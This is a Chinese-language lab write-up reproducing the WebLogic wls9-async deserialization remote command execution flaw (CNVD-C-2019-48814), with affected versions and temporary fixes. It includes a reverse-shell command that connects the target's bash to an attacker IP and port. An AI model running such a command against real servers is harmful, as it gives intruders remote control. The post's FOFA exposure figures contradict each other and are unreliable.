WebLogic wls-async 反序列化遠程命令執行漏洞(CNVD-C-2019-48814)漏洞復現

 

0X01 weblogic組件介紹

WebLogic是美國Oracle公司出品的一個Application Server,確切的說是一個基於JAVAEE架構的中間件,是用於開發、集成、部署和管理大型分佈式Web應用、網絡應用和數據庫應用的Java應用服務器。

 

WebLogic將Java的動態功能和Java Enterprise標準的安全性引入大型網絡應用的開發、集成、部署和管理之中。是商業市場上主要的Java(J2EE)應用服務器軟件(Application Server)之一,是世界上第一個成功商業化的J2EE應用服務器,具有可擴展性,快速開發,靈活,可靠性等優勢。

根據FOFA的數據統計,全球共有23024個開放的weblogic服務。其中美國最多,有129583個開放服務。其次是中國,有28772個開放的weblogic服務。德國排第三,有22352個開放的weblogic服務。新加坡有18473個開放的weblogic服務。英國有15980個開放的weblogic服務。

國內的weblogic服務分佈如下,北京最多,有6824個服務,浙江有4805個服務,山東有985個服務,廣東有801個服務,上海有778個服務。

 

 

0X02漏洞描述

CNVD-C-2019-48814漏洞主要是利用了WebLogic中的wls9-async組件,攻擊者可以在

/_async/AsyncResponseService路徑下傳入惡意的xml格式的數據,傳入的數據在服務器端反序列化時,執行其中的惡意代碼,實現遠程命令執行,攻擊者可以進而獲得整臺服務器的權限。

0X03漏洞影響

WebLogic 10.*

WebLogic 12.1.3.0

 

0X04漏洞復現

環境描述:

靶機:192.168.47.140(必須使用linux系統,weblogic10.3.6.0)

攻擊:192.168.47.142(kali)

1,確定目標系統對外開放/_async/AsyncResponseService路徑,存在此漏洞。

 

2,kali本地監聽9999端口。

 

3,傳入構造好額xml數據進行攻擊。提交

 

4,kali顯示攻擊成功

 

執行命令

 

 

 

備註:爲什麼bash -i >& /dev/tcp/192.168.47.142/9999 0>&1命令?

反彈shell命令bash -i >&/dev/tcp/192.168.190.138/6666 0>&1

 

所以整句話的意思就是把當前運行weblogic的bash反彈到192.168.47.142的9999端口上。

 

0X05 漏洞修復

官方暫未發佈針對此漏洞的修復補丁,在官方修復之前,可以採取以下方式進行臨時防護:

(1)配置URL訪問策略

通過訪問控制策略禁止對/_async/*路徑的訪問。

(2)刪除war文件及相關文件夾,並重啓Weblogic服務。

具體路徑如下:

版本號爲10.3.*:

\Middleware\wlserver_10.3\server\lib\bea_wls9_async_response.war

%DOMAIN_HOME%\servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\

%DOMAIN_HOME%\servers\AdminServer\tmp\.internal\bea_wls9_async_response.war

版本號爲12.1.3:

\Middleware\Oracle_Home\oracle_common\modules\com.oracle.webservices.wls.bea-wls9-async-response_12.1.3.war

%DOMAIN_HOME%\servers\AdminServer\tmp\.internal\com.oracle.webservices.wls.bea-wls9-async-response_12.1.3.war

%DOMAIN_HOME%\servers\AdminServer\tmp\_WL_internal\com.oracle.webservices.wls.bea-wls9-async-response_12.1.3

獲取最新網絡安全漏洞和CTF學習資料請關注 安全漏洞環境學習公衆號!

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章